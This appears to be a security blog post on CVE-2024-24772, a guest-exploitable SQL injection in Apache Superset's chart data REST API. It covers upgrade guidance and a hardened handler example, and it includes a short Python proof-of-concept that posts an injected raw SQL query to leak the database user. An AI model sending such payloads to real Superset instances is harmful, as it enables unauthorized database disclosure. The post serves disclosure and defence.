CVE-2024-24772 is a security vulnerability impacting Apache Superset, a popular data visualization platform used by organizations worldwide. This post will break down the issue in simple terms, show how an attacker could use it, and explain how you can protect your systems.
Quick Summary
- Product affected: Apache Superset
- Fixed versions: 3.0.4 and 3.1.1
- Public ID: CVE-2024-24772
- Risk: HIGH – SQL Injection leading to information leak, exploitable by guests (unauthenticated users)
What Is the Issue?
A guest (not logged-in, or user with minimal privileges) can interact with one of Superset's chart data REST APIs in a tricky way. By sending specially crafted requests, the attacker can:
- Cause errors on purpose, which return messages leaking sensitive data from the database.
This means an attacker could learn about the database structure, get system messages, and possibly see chunks of sensitive information—making it easier for later, more dangerous attacks.
How Does the Attack Work?
Superset has REST endpoints that allow users to fetch chart data. These endpoints are supposed to be safe, but in affected versions, they don't properly 'sanitize' SQL statements sent by users in their requests.
A guest can POST directly to endpoints like /api/v1/chart/data and slip in tricky SQL code in the JSON body. If the supplied SQL causes a database error, the error message Superset returns may include data from the database or the exact error, which leaks information.
Let's look at a simplified code snippet for a malicious API call:

```python
import requests

# Placeholder hostname: substitute the instance under test
SUPERSET_URL = "https://you.rsuperset.com/api/v1/chart/data"

# No login required! Guest attack
# Craft a payload that will cause an error and maybe leak data
payload = {
    "query_context": {
        "datasource": {"id": 1, "type": "table"},
        "queries": [{
            "raw_sql": "SELECT 1 FROM (SELECT 'leak'||(SELECT CURRENT_USER))a"  # Force error or concatenation
        }]
    }
}
headers = {"Content-Type": "application/json"}
r = requests.post(SUPERSET_URL, json=payload, headers=headers)

# If you get error messages, inspect the details:
print(r.text)  # Sensitive info may appear here!
```
Result:
The response might contain detailed error messages straight from the database, possibly leaking the current DB user, schema names, or even parts of data.
Why Is This Serious?
- Anyone can try it. If your Superset instance is even partly public (or exposed internally), a non-logged-in user can exploit it.
- Attackers gain knowledge: Knowing DB users, tables, and schema is like having the blueprint to your house—much easier to plan follow-up attacks.
- Potential lateral movement: More creative attackers could chain this with other vulnerabilities or misconfigurations and further escalate.
- If running the 3.0 series: upgrade to 3.0.4
- If running the 3.1 series: upgrade to 3.1.1
Download the latest releases here.
The fix ensures guest users cannot inject arbitrary SQL or see detailed database errors anymore.
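As an added illustration (not Superset's own code), here is a handler shape that applies the two properties the fix restores: guest users cannot submit raw SQL at all, and database errors are logged server-side but reach the client only as a generic message with a reference id. The handler, the request-body layout and the `is_fixed_version` helper are assumptions for this demo; the version thresholds (3.0.4 and 3.1.1) come from the advisory.

```python
from __future__ import annotations

import logging
import sqlite3
import uuid

log = logging.getLogger("chart_data")


def is_fixed_version(version: str) -> bool:
    """True if a Superset version carries the fix: 3.0.4+ on the 3.0 line, 3.1.1+ on the 3.1 line, or newer.

    Assumption for the demo: plain 'major.minor.patch' strings, no pre-release suffixes.
    """
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    if (major, minor) == (3, 0):
        return patch >= 4
    if (major, minor) == (3, 1):
        return patch >= 1
    return (major, minor) > (3, 1)  # anything older than 3.0.4 is affected


def handle_chart_data(body: dict, is_guest: bool, conn: sqlite3.Connection) -> tuple[int, dict]:
    """Hypothetical hardened chart-data handler. Returns (http_status, json_body)."""
    queries = body.get("query_context", {}).get("queries", [])

    # Property 1: guests never get to supply arbitrary SQL, whatever the body looks like.
    if is_guest and any("raw_sql" in q for q in queries):
        return 403, {"message": "Guest users may not submit raw SQL"}

    results = []
    for q in queries:
        sql = q.get("raw_sql", "SELECT 1")  # demo fallback; a real handler builds SQL from the chart form
        try:
            results.append(conn.execute(sql).fetchall())
        except sqlite3.Error as exc:
            # Property 2: the driver's error text (table names, DB user, etc.) stays in the server log;
            # the client only gets an opaque reference it can quote to support.
            ref = uuid.uuid4().hex[:8]
            log.error("chart/data query failed ref=%s detail=%s", ref, exc)
            return 400, {"message": f"Query failed (ref {ref})"}
    return 200, {"result": results}
```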
Further Reading & References
- Official Apache Superset Advisory
- NVD entry for CVE-2024-24772
- Superset Release Notes
- Superset Security Documentation
✔️ Yes: UPGRADE ASAP
❌ No: If you're on 3.0.4/3.1.1 or higher, you're safe from this issue.
Conclusion
CVE-2024-24772 shows that even trusted, widely-used analytics tools like Apache Superset can have critical vulnerabilities—sometimes exploitable by unauthenticated users. If you're running a vulnerable version, patch right now. Review public access to your Superset dashboards, and limit guest user capabilities as much as possible.
Stay safe, and keep your data visualization secure!
*If you found this post helpful, share it with your sysadmin or security team!*
Timeline
Published on: 02/28/2024 12:15:47 UTC
Last modified on: 02/28/2024 15:15:09 UTC